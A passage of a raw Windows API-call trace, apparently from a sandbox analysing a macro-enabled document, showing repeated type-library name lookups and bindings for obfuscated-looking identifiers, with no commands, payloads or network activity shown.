returned 0x0 [0069.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_EBxDwBBk") returned 16 [0069.845] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.845] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_EBxDwBBk", lHashVal=0x109348, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.845] IUnknown:Release (This=0x665ba50) returned 0xd [0069.845] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.845] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_EBxDwBBk", lHashVal=0x109348, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.845] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.845] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.845] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_EBxDwBBk", lHashVal=0x109348, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.845] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.845] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.845] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_EBxDwBBk", lHashVal=0x109348, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.845] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.845] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.845] IUnknown:Release (This=0x665ba50) returned 0xd [0069.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87187e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_EBxDwBBk") returned 16 [0069.845] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_EBxDwBBk", lHashVal=0x109348, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x77004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x77004400000000, pDummy=0x0) returned 0x0 [0069.845] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b823e2 | out: _Dst=0x144ec0) returned 0x0 [0069.845] ITypeComp:RemoteBind (in: This=0x665ba60, szName="GDoXAZ", lHashVal=0x10ded7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b823ba, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="GDoXAZ") returned 7 [0069.845] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="GDoXAZ", lHashVal=0x10ded7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b823ba, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="GDoXAZ") returned 7 [0069.845] ITypeComp:RemoteBind (in: This=0x665bd30, szName="GDoXAZ", lHashVal=0x10ded7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.846] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GDoXAZ") returned 0x10ded7 [0069.846] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="GDoXAZ" | out: _Dst="GDoXAZ") returned 0x0 [0069.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="GDoXAZ") returned 7 [0069.846] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.846] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="GDoXAZ", lHashVal=0x10ded7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.846] IUnknown:Release (This=0x665ba50) returned 0xd [0069.846] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.846] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="GDoXAZ", lHashVal=0x10ded7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.846] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.846] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.846] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="GDoXAZ", lHashVal=0x10ded7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.846] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.846] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.846] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="GDoXAZ", lHashVal=0x10ded7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.846] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b823ba, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="GDoXAZ") returned 7 [0069.846] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="GDoXAZ", lHashVal=0x10ded7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.846] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0069.846] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b823ba | out: _Dst=0x68767a0) returned 0x0 [0069.846] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_GDoXAZ") returned 0x105941 [0069.846] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ParamArray", cchCount1=-1, lpString2="_B_var_GDoXAZ", cchCount2=-1) returned 3 [0069.846] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_GDoXAZ" | out: _Dst="_B_var_GDoXAZ") returned 0x0 [0069.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_GDoXAZ") returned 14 [0069.846] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.846] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_GDoXAZ", lHashVal=0x105941, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.846] IUnknown:Release (This=0x665ba50) returned 0xd [0069.846] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.847] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_GDoXAZ", lHashVal=0x105941, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.847] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.847] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.847] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_GDoXAZ", lHashVal=0x105941, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.847] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.847] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.847] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_GDoXAZ", lHashVal=0x105941, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.847] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.847] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.847] IUnknown:Release (This=0x665ba50) returned 0xd [0069.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8718ae, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_GDoXAZ") returned 14 [0069.847] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_GDoXAZ", lHashVal=0x105941, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x47005f00720061, ppTypeComp=0x41005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x47005f00720061, ppTypeComp=0x41005800000000, pDummy=0x0) returned 0x0 [0069.847] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b823ba | out: _Dst=0x144ec0) returned 0x0 [0069.847] ITypeComp:RemoteBind (in: This=0x665ba60, szName="EAAA4AGA", lHashVal=0x107e8c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8240e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="EAAA4AGA") returned 9 [0069.847] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="EAAA4AGA", lHashVal=0x107e8c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8240e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="EAAA4AGA") returned 9 [0069.847] ITypeComp:RemoteBind (in: This=0x665bd30, szName="EAAA4AGA", lHashVal=0x107e8c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.847] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EAAA4AGA") returned 0x107e8c [0069.847] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="EAAA4AGA" | out: _Dst="EAAA4AGA") returned 0x0 [0069.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="EAAA4AGA") returned 9 [0069.847] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.847] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="EAAA4AGA", lHashVal=0x107e8c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.847] IUnknown:Release (This=0x665ba50) returned 0xd [0069.848] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.848] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="EAAA4AGA", lHashVal=0x107e8c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.848] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.848] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.848] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="EAAA4AGA", lHashVal=0x107e8c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.848] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.848] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.848] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="EAAA4AGA", lHashVal=0x107e8c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.848] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8240e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="EAAA4AGA") returned 9 [0069.848] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="EAAA4AGA", lHashVal=0x107e8c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.848] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x68767a0 [0069.848] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b8240e | out: _Dst=0x68767a0) returned 0x0 [0069.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_EAAA4AGA") returned 0x105615 [0069.848] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_EAAA4AGA" | out: _Dst="_B_var_EAAA4AGA") returned 0x0 [0069.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_EAAA4AGA") returned 16 [0069.848] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.848] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_EAAA4AGA", lHashVal=0x105615, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.848] IUnknown:Release (This=0x665ba50) returned 0xd [0069.848] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.848] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_EAAA4AGA", lHashVal=0x105615, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.848] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.848] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.848] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_EAAA4AGA", lHashVal=0x105615, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.848] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.848] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.848] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_EAAA4AGA", lHashVal=0x105615, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.848] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.849] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.849] IUnknown:Release (This=0x665ba50) returned 0xd [0069.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8718de, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_EAAA4AGA") returned 16 [0069.849] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_EAAA4AGA", lHashVal=0x105615, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0) returned 0x0 [0069.849] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8240e | out: _Dst=0x144ec0) returned 0x0 [0069.849] ITypeComp:RemoteBind (in: This=0x665ba60, szName="HDAUUADB", lHashVal=0x10096d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8243a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="HDAUUADB") returned 9 [0069.849] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="HDAUUADB", lHashVal=0x10096d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8243a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="HDAUUADB") returned 9 [0069.849] ITypeComp:RemoteBind (in: This=0x665bd30, szName="HDAUUADB", lHashVal=0x10096d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.849] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HDAUUADB") returned 0x10096d [0069.849] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="HDAUUADB" | out: _Dst="HDAUUADB") returned 0x0 [0069.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="HDAUUADB") returned 9 [0069.849] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.849] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="HDAUUADB", lHashVal=0x10096d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.849] IUnknown:Release (This=0x665ba50) returned 0xd [0069.849] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.849] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="HDAUUADB", lHashVal=0x10096d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.849] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.849] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.849] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="HDAUUADB", lHashVal=0x10096d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.849] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.849] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.849] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="HDAUUADB", lHashVal=0x10096d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.850] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8243a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="HDAUUADB") returned 9 [0069.850] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="HDAUUADB", lHashVal=0x10096d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.850] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x68767a0 [0069.850] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b8243a | out: _Dst=0x68767a0) returned 0x0 [0069.850] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_HDAUUADB") returned 0x10e135 [0069.850] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_HDAUUADB" | out: _Dst="_B_var_HDAUUADB") returned 0x0 [0069.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_HDAUUADB") returned 16 [0069.850] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.850] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_HDAUUADB", lHashVal=0x10e135, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.850] IUnknown:Release (This=0x665ba50) returned 0xd [0069.850] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.850] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_HDAUUADB", lHashVal=0x10e135, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.850] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.850] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.850] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_HDAUUADB", lHashVal=0x10e135, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.850] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.850] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.850] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_HDAUUADB", lHashVal=0x10e135, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.850] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.850] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.850] IUnknown:Release (This=0x665ba50) returned 0xd [0069.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87190e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_HDAUUADB") returned 16 [0069.850] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_HDAUUADB", lHashVal=0x10e135, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x55005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x55005500000000, pDummy=0x0) returned 0x0 [0069.850] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8243a | out: _Dst=0x144ec0) returned 0x0 [0069.850] ITypeComp:RemoteBind (in: This=0x665ba60, szName="cADBBA", lHashVal=0x10da74, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82492, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cADBBA") returned 7 [0069.851] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="cADBBA", lHashVal=0x10da74, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82492, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cADBBA") returned 7 [0069.851] ITypeComp:RemoteBind (in: This=0x665bd30, szName="cADBBA", lHashVal=0x10da74, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.851] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cADBBA") returned 0x10da74 [0069.851] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="cADBBA" | out: _Dst="cADBBA") returned 0x0 [0069.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="cADBBA") returned 7 [0069.851] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.851] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="cADBBA", lHashVal=0x10da74, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.851] IUnknown:Release (This=0x665ba50) returned 0xd [0069.851] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.851] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="cADBBA", lHashVal=0x10da74, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.851] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.851] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.851] ITypeLib:RemoteIsName (in: 